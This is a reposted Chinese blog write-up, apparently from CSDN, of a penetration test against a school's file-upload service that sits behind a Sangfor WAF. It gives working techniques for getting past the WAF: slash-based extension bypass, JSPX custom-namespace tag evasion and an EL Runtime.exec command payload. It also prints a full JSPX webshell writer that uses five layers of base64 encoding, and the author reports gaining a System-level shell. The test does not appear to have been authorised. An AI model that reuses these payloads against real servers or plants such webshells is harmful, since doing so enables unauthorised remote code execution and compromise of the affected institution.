绕过waf的任意文件上传

最新推荐文章于 2023-08-19 12:05:02 发布
最新推荐文章于 2023-08-19 12:05:02 发布
阅读量337 收藏 1
点赞数
分类专栏: # 挖掘技巧 # tips bypass 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/124822686
版权
挖掘技巧 同时被 3 个专栏收录
48 篇文章 15 订阅
订阅专栏
tips
28 篇文章 4 订阅
订阅专栏
bypass
9 篇文章 0 订阅
订阅专栏

 原文出处:记一次绕过waf的任意文件上传 - 先知社区 (aliyun.com)

 

前言

前几天对自己学校进行的一次渗透测试,由于深信服过于变态,而且拦截会直接封ip,整个过程有点曲折

期间进行了后缀名绕过,jspx命名空间绕过、获取网站根目录、base64五层编码写入shell等操作

0x01 获取网站接口

主界面:

上传点:

由于该应用是内嵌企业微信的套皮Html,所以我们首先用Burp Suite抓包获取接口和cookie

任意文件上传:


文件名强制命名为code+学号,后缀为最后一次点号出现之后的字母

0x02 后缀名绕过

代码不限制后缀名,但是waf限制呀!

后缀名jspjspx会拦截,但是jsppjspxx等不会拦截

所以要利用windows特性绕过,常规的绕过手法例如末尾加点号::$DATA均无法绕过

经过fuzz,发现正斜杠可以绕过

0x03 内容绕过

常见的jsp标记均无法绕过

所以我们得绕过JSP标记检测,这里参考了yzddmr6师傅的两种 绕过方法

  • jspEL表达式绕过
  • jspx命名空间绕过

第一种是利用${}标记

payload:${Runtime.getRuntime().exec(request.getParameter("x"))}

但深信服waf过滤了一句话,需要变形绕过

鄙人太菜了,不了解相关函数的变形绕过,所以选择第二种写法

第二种是利用命名空间的特性

参照yzddmr6师傅的图:

使用自定义的命名空间,替换掉jsp的关键字

将原本的<jsp:scriptlet>替换成<自定义字符:scriptlet>

这样waf的正则匹配不到<jsp:scriptlet>自然就会放行

<hi xmlns:hi="http://java.sun.com/JSP/Page">
    <hi:scriptlet>
        out.println(30*30);
    </hi:scriptlet>
</hi>

0x04 获取网站路径

这里我们不能用相对路径来写入webshell

因为TomcatApache不同,根目录并不是以代码运行位置决定所在的目录,而是默认为Tomcat/bin作为根目录

# 获取当前的根目录
String path = System.getProperty("user.dir");
out.println(path);

# 获取web项目所在的目录
String path = application.getRealPath("test.jsp");
out.println(path);

所以写入shell的绝对路径应为D:/tomcat8/webapps/declare/static/upload/test.jsp

0x05 编码或加密绕过waf写入shell

菜鸡的payload:

<hi xmlns:hi="http://java.sun.com/JSP/Page">
    <hi:directive.page import="java.util.Base64,java.io.*"/>
    <hi:scriptlet>
        File file = new File("D:/tomcat8/webapps/declare/static/upload/test.jsp");
        FileWriter fileOut = new FileWriter(file);
        Base64.Decoder base64 = Base64.getDecoder();
        byte[] str = base64.decode(base64.decode(base64.decode(base64.decode(base64.decode(request.getParameter("x").getBytes("utf-8"))))));
        try {
            fileOut.write(new String(str, "utf-8"));
            out.println("写入成功");
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (fileOut != null) {
                    fileOut.close();
                }
        } catch (Exception e) {
                e.printStackTrace();
            }
        }
    </hi:scriptlet>
</hi>

一开始我是用两层base64编码,还是被检测了,经过fuzz发现五层编码即可绕过

鄙人太懒了,不想重新造轮子。如果各位师傅有时间的话,遇到这种waf建议用RSA、AES等加密算法绕过

成功getshell,System权限

看了一眼依赖,可能存在log4j2jackson的RCE,留着下次当靶场继续测试

0x06 总结

深信服的waf算挺强了,而且也足够恶心,检测可疑行为直接封ip,光是fuzz就用掉了快30个ip了

yggcwhat
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蚁剑高级模块开发
悦分享
08-04 1118
蚁剑进行二次开发的一些技巧与经验。
【每日渗透笔记】文件上传绕过尝试
10-27 3920
文件上传】白名单
jsp文件上传_文件上传突破waf总结
weixin_39844284的博客
12-01 657
前言在这个waf横行的年代,绕waf花的时间比找漏洞还多,有时候好不容易找到个突破口,可惜被waf拦得死死的。。。这里总结下我个人常用的文件上传绕过waf的方法,希望能起到抛砖引玉的效果,得到大佬们指点下。常见情况下面总结下我经常遇到的情况:一. 检测文件扩展名很多waf在上传文件的时候会检测文件扩展名,这个时候又能细分几种情况来绕过。1. 寻找黑名单之外的扩展名比如aspx被拦截,来个ashx就...
免杀一句话
cc1988429的专栏
04-18 2370
0x01:ASP一句话 1. 2. 3. 0x02:免杀大部分网站的一句话 4. 0x03:免杀部分网站过略的一句话 5.executerequest("x") 0x04:免杀部分网站过略双引号的一句话 6. 0x05:php一句话 7. 0x06:aspx一句话 8. WebAdmin2Y.x.y aaaaa = newWebAdmin2Y.x.y("x");
认识JSP webshell免杀
最新发布
xlsj雪松的博客
08-19 913
Tomcat运行这就是一个典型的webshell,但这个webshell的各种特征已经被安全检测平台记录,很容易识别出来。【D盾】【shellpub】接下来进行免杀,免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
webshell之jsp免杀
tomyyyyy
11-26 2478
webshell之jsp免杀 转载自webshell免杀研究 原理 向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。 结构 实现三步 数据的传递 执行所传递的数据 回显 数据传递 String x = request.getParameter("x"); 执行所传递的数据 Class rt = Class.forN...
上传绕过_上传绕过WAF姿势与防御漫谈
weixin_39963053的博客
11-25 423
*本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担今天就聊聊关于上传绕过WAF的姿势,WAF(Web Application Firewall)简单的来说就是执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。上传绕过不算什么技术了,正所谓未知防,焉知攻,先来了解一下网站的防御措施吧!一、上传绕过姿势1.一般开发人员防御策略客户端java...
上传绕过WAF的15中姿势
06-29
绕过WAF进行文件上传的文旦,可以学习一些姿势加以利用。
2022年文件上传漏洞绕过姿势整理,过waf
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
最新免杀webshell
07-21
webshell 过世界杀软。带防删功能。提权加强版。
2018最新免杀大马
12-20
1.界面简洁 功能如下: 文件管理 批量挂马 批量清马 批量替换 扫描木马 系统信息 执行命令 组件接口 扫描端口 搜索文件 ServU提权 MYSQL提权 MYSQL执行 MYSQL管理 多数据库操作 NC反弹 Ftp_Brute Ftp连接 PHP反弹 Linux反弹 执行PHP代码 弱口令探测 注册表操作 HTTP在线代理 HTTP下载 DDOS攻击 进程
WAF上传绕过+wbehshell免杀-漏洞银行大咖面对面9-ian
07-31
WAF上传绕过+wbehshell免杀-漏洞银行大咖面对面9-ian
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
常见6种WAF绕过和防护原理
热门推荐
07-08 1万+
关于上传绕过WAF的姿势!
记一次绕过waf任意文件上传
include_voidmain的博客
05-25 423
声明 以下内容,来自先知社区的John作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。 前言 前几天对自己学校进行的一次渗透测试,由于深信服过于变态,而且拦截会直接封ip,整个过程有点曲折,期间进行了后缀名绕过jspx命名空间绕过、获取网站根目录、base64五层编码写入shell等操作。 0x01 获取网站接口 主界面: 上传点: 由于该应用是内嵌企业微信的套皮Html,所以我们首先用Burp Suite抓包
[By Pass] WAF绕过方式
weixin_43586169的博客
06-08 1071
WAF的多种绕过方式
绕过WAF单一方法
小刚的博客
04-30 1556
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 WAF绕过大法绕过WAF单一绕过方式1,一次URL编码绕过2,二次URL编码绕过3,其他编码4,空格过滤5,内联注释绕过6,大小写绕过7,双写关键字绕过8,宽字节绕过9,添加%绕过10,cookie注入11,请求方式差异规则松懈性绕过12,复参数绕过总结 绕过WAF 在我们进行sql注入的...
如何防止文件上传绕过WAF
05-20
要防止文件上传绕过WAF,可以采取以下措施: 1. 文件扩展名过滤:通过对上传文件的扩展名进行过滤,只允许上传指定类型的文件。同时,需要注意的是,黑名单式的过滤不如白名单式的过滤安全。 2. MIME类型过滤:WAF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值